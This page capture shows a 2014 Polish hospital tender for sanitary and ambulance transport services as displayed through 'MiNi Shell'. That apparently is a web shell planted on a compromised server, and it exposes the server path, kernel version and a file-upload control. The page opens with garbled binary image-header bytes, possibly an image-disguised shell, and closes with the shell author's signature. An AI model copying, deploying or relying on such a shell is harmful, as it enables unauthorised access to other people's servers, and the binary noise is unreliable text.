JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140912/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140912/195267-N-2014.html

<p class="kh_header"><b>Tarnowskie Góry: USŁUGA PN. TRANSPORT SANITARNY</b><br>
<b>Numer ogłoszenia: 195267 - 2014; data zamieszczenia: 12.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielospecjalistyczny Szpital Powiatowy Spółka Akcyjna , ul. Pyskowicka 47-51, 42-612 Tarnowskie Góry, woj. śląskie, tel. 32 285 40 58, faks 32 384 54 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wspsa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA PN. TRANSPORT SANITARNY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest są usługi transportu sanitarnego. Zamówienie składa się z 3 części tzw. pakietów, z których każdy stanowi oddzielny przedmiot zamówienia Pakiet 1 - usługa transportu sanitarnego realizowana karetką typu S przez zespoły specjalistyczne, w skład których wchodzą co najmniej trzy osoby uprawnione do wykonywania medycznych czynności ratunkowych, w tym lekarz oraz pielęgniarka lub ratownik medyczny. W przypadku gdy, żaden z innych członków zespołu nie ma uprawnień do prowadzenia pojazdów uprzywilejowanych, czwartą osobą w zespole może być kierowca, który jest osobą bez wykształcenia medycznego. Usługa transportu sanitarnego karetką typu S będzie realizowana we wszystkie dni tygodnia, w tym święta, 24 godziny dobę na telefoniczne wezwanie osoby uprawnionej ze strony Zamawiającego. Środek transportu sanitarnego typu S winien być wyposażony w sprzęt medyczny i aparaturę medyczną niezbędną do podtrzymania życia pacjenta między innymi w stymulator zewnętrzny serca. Transport sanitarny typu S winien zapewnić usługę w stanach nagłych w ciągu 30 minut od czasu zgłoszenia. Miejsca leżące siedzące minimum 2. Czas i odległość usługi transportowej liczy się od rozpoczęcia transportu w siedzibie Zamawiającego do miejsca wskazanego w zleceniu jako miejsce docelowe. Pakiet 2 - transport sanitarny realizowany karetką typu P przez zespoły podstawowe, w skład których wchodzą co najmniej dwie osoby uprawnione do wykonywania medycznych czynności ratunkowych, w tym pielęgniarka lub ratownik medyczny. W przypadku gdy, żaden z innych członków zespołu nie ma uprawnień do prowadzenia pojazdów uprzywilejowanych, trzecią osobą w zespole może być kierowca, który jest osobą bez wykształcenia medycznego. Usługa transportu sanitarnego karetką typu P polegająca na przewozie pacjentów w pozycji leżącej lub siedzącej zgodnie z zaleceniami lekarza, będzie realizowana we wszystkie dni tygodnia, w tym święta, 24 godziny dobę na telefoniczne wezwanie osoby uprawnionej ze strony Zamawiającego, zgodnie z zapotrzebowaniem Zamawiającego. Środek transportu sanitarnego typu P winien być wyposażony w środki łączności i być przystosowany do transportu pacjentów, materiałów biologicznych, leków i innych materiałów koniecznych do udzielania świadczeń medycznych oraz pacjenta lub pracownika medycznego Zamawiającego. Czas i odległość usługi transportowej liczy się od momentu wyjazdu z siedziby Zamawiającego do momentu powrotu do siedziby Zamawiającego. Pakiet 3 - transport materiału biologicznego, w tym krwi i jej składników przez odpowiednio dostosowane do tego typu usług samochody na trasach a)Wielospecjalistyczny Szpital Powiatowy S.A., Tarnowskie Góry, ul. Opolska 21 - Wielospecjalistyczny Szpital Powiatowy S.A., Tarnowskie Góry, ul. Pyskowicka 47-51 lub odwrotnie b) Wielospecjalistyczny Szpital Powiatowy S.A., Tarnowskie Góry, ul. Pyskowicka 47-51 albo ul. Opolska 21- Regionalne Centrum Krwiodawstwa i Krwiolecznictwa, Katowice, ul. Raciborska 15, c) Wielospecjalistyczny Szpital Powiatowy S.A., Tarnowskie Góry, ul. Pyskowicka 47 51 albo ul. Opolska 21 - Instytut Medycyny Pracy i Zdrowia Środowiskowego w Sosnowcu 41-200, ul. Kościelna 13 d) innych zgodnie ze zleceniem Zamawiającego 80 km. 2. Pozostałe warunki realizacji przedmiotu zamówienia 2.1. Wykonawca jest zobowiązany do prowadzenia dokumentacji medycznej i statystycznej, stosownie do obowiązujących przepisów prawa. 2.2. Zamawiający wymaga, aby przez cały okres realizacji umowy Wykonawca posiadał ważne umowy ubezpieczenia w zakresie wskazanym w ustawie o działalności leczniczej. W sytuacji, gdy w trakcie obowiązywania umowy umowa ubezpieczenia wygaśnie, Wykonawca będzie zobowiązany zawrzeć nową umowę ubezpieczenia w takim terminie, aby zapewnić ciągłość wykonywania przedmiotowej umowy. Wartość i zakres rzeczowy umowy ubezpieczenia musi pozostawać zgodny z obowiązującymi w tym zakresie przepisami prawa. 2.3. Zamawianie usług odbywać się będzie telefonicznie 2.4. Zamawiający wymaga, aby Wykonawca spełniał poniższe warunki 1) był w gotowości całodobowej, przez co należy rozumieć przyjmowanie zgłoszeń oraz wykonywanie zleconej usługi 24 h na dobę 7 dni w tygodniu, w tym również w dni wolne od pracy, niedziele i święta - w zależności od pakietu, do którego przystępuje, przez cały okres związania umową 2) był punktualny - czas reakcji na zgłoszenie (zlecenie przewozu) w przypadkach nagłych - natychmiast, w pozostałych przypadkach - w terminie uzgodnionym z udzielającym zamówienia, w zależności od pakietu, do którego przystępuje 3) posiadał środki transportu sanitarnego a) spełniające wszelkie wymagania sanitarne i techniczne określone m. in. w dziale VI a ustawy z dnia 27 sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych (Dz. U. 2008 r. nr 164, poz. 1027 ze późn. zm.) i we właściwych ustawach i rozporządzeniach b) spełniające wymagania dotyczące wyposażenia medycznego, dotyczące zestawu leków oraz wyrobów medycznych niezbędnych podczas wykonywania przedmiotowej usługi, określone w Zarządzeniu Nr 98 2006 z dnia 27 października 2006 r. Prezesa Narodowego Funduszu Zdrowia w sprawie przyjęcia Szczegółowych materiałów informacyjnych o przedmiocie postępowania w sprawie zawarcia umów o udzielanie świadczeń opieki zdrowotnej oraz o realizacji i finansowaniu umów o udzielanie świadczeń opieki zdrowotnej w rodzaju pomoc doraźna i transport sanitarny c.) których stan techniczny zapewniać będzie pełne bezpieczeństwo przewożonym osobom i odpowiednią temperaturę dostosowaną do pory roku, (samochody wyposażone w klimatyzację) wyposażone w sygnalizację świetlno-dźwiękową wymaganą dla pojazdów uprzywilejowanych na podstawie zezwolenia Ministra Spraw Wewnętrznych i Administracji na używanie sygnalizacji w ruchu drogowym 4) pracownicy przyjmującego zamówienie muszą spełniać warunki zdrowotne, potwierdzone aktualną pracowniczą książeczką zdrowia do celów sanitarno-epidemiologicznych, posiadać aktualne szczepienia ochronne w kierunku wirusowych zapaleń wątroby stosować zasady profilaktyki zakażeń WZW, HIV oraz przestrzegać reżimów sanitarnych, zgodnie z ustawą z dnia 5 grudnia 2008 r. o zapobieganiu oraz zwalczaniu zakażeń i chorób zakaźnych u ludzi (Dz. U. z 2008 r. Nr 234, poz. 1570 z późn. zm.) 5) kierowca środka transportu sanitarnego musi posiadać prawo jazdy odpowiedniej kategorii, świadectwa kwalifikacji do kierowania pojazdami, a także zaświadczenie o odbyciu szkoleń w zakresie udzielania pierwszej pomocy 6) Wykonawca oświadcza, że zgodnie z art. 36 ust. 2 ustawy z dnia 8 września 2006 r. o Państwowym Ratownictwie Medycznym (Dz. U. Nr 191, poz. 1410 z późn. zm.) zespół ratownictwa medycznego jest wyposażony w specjalistyczny środek transportu sanitarnego, spełniający cechy techniczne i jakościowe określone w Polskich Normach przenoszących europejskie normy zharmonizowane. Aktualnie obowiązującą w tym zakresie normą jest Polska Norma PN-EN 1789 2008 Pojazdy medyczne i ich wyposażenie - ambulanse drogowe. Ponadto, Wykonawca oświadcza, że będzie realizował przedmiot umowy w ramach Pakietów 1 i 2, środkami transportu spełniającymi wymagania określone Polska Normą PN-EN1865N 2002. 7) Wykonawca oświadcza, iż spełnia wszystkie stawiane wymagania oraz zobowiązuje się, że podda się kontrolom w zakresie dotyczącym realizacji zlecanej usługi (umowy). 8) Wykonawca oświadcza, że dokona rejestracji umowy w portalu Świadczeniodawcy na stronie Narodowego Funduszu Zdrowia w terminie 14 dni od jej podpisania. 9) Wykonawca wykonujący transport preparatów krwi oświadcza, że posiada protokół walidacji sprzętu stosowanego do przewożenia w w składników krwi przeprowadzonej zgodnie z obowiązującą procedurą. 3. Składane oferty muszą zawierać pełny zakres przedmiotu zamówienia w zakresie danego pakietu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika [E] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika [E] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika [E] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika [E] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika [E] do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- aktualną polisę ubezpieczeniową od odpowiedzialności cywilnej prowadzonej działalności - polisa ważna w okresie realizacji usługi. W przypadku, gdy okres ubezpieczenia nie obejmuje całego terminu realizacji usługi Oferent zobowiązuje się do kontynuacji ubezpieczenia w celu zapewnienia ciągłości w trakcie realizacji usługi. Dla umów ubezpieczenia zawartych po dniu 1 stycznia 2012 r. polisa powinna być zawarta na podstawie art.17 i zgodna z art. 25 ustawy o działalności leczniczej.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony szczegółowo formularz oferty - część [C] stanowiący załącznik do SIWZ 2. Wypełniony formularz asortymentowo - cenowy - część [D] stanowiący załącznik do SIWZ 3. Wzór oświadczeń - część [E] stanowiący załącznik do SIWZ 4. Wzór oświadczeń - część [F] stanowiący załącznik do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W sprawach niniejszą umową nieuregulowanych mają zastosowanie odpowiednie przepisy kodeksu cywilnego, ustawy z dnia 15 kwietnia 2011 r. o działalności leczniczej oraz ustawy z dnia 27 sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych oraz ustawy z dnia 27 sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych (Dz.U.2008.164.1027 ze zm.) 2. Zmiany treści umowy wymagają zgody obu stron wyrażonej na piśmie pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wspsa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wielospecjalistyczny Szpital Powiatowy S.A. w Tarnowskich Górach przy ul. Pyskowickiej 47-51 - Dział zamówień publicznych, budynek administracji..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2014 godzina 10:30, miejsce: Wielospecjalistyczny Szpital Powiatowy S.A. w Tarnowskich Górach przy ul. Pyskowickiej 47-51 - Sekretariat, budynek administracji..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.P. Karetka do przewozu pacjentów w pozycji leżącej lub siedzącej - karetka typu S, 24 godziny dobę 7 dni w tygodniu w tym także święta Ilość na 16 m-cy 1 Godzina z zespołem medycznym z lekarzem 613 godzin 2 Ilość km 11 000 km..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.P. Karetka do przewozu pacjentów w pozycji leżącej lub siedzącej - karetka typu P, 24 godziny dobę 7 dni w tygodniu w tym także święta Ilość na 16 m-cy 1 Godzina z zespołem medycznym z ratownikiem medycznym 402 godziny 2 Ilość km 5 192 km..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.P. Transport materiału biologicznego, w tym krwi i jej składników Ilość na 16 m-cy 1 Wielospecjalistyczny Szpital Powiatowy S.A., Tarnowskie Góry, ul. Opolska 21 - Wielospecjalistyczny Szpital Powiatowy S.A., Tarnowskie Góry, ul. Pyskowicka 47-51 lub odwrotnie 60 wyjazdów 2 Wielospecjalistyczny Szpital Powiatowy S.A., Tarnowskie Góry, ul. Pyskowicka 47-51 lub Opolska 21 - Regionalne Centrum Krwiodawstwa i Krwiolecznictwa, Katowice, ul. Raciborska 15 240 wyjazdów 3 Wielospecjalistyczny Szpital Powiatowy S.A., Tarnowskie Góry, ul. Pyskowicka 47-51 lub ul. Opolska 21- Instytut Medycyny Pracy i Zdrowia Środowiskowego w Sosnowcu 41-200, ul. Kościelska 13 27 wyjazdów 4 Inne, zgodnie ze zleceniami Zamawiającego 80 km (wycena za 1 km)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com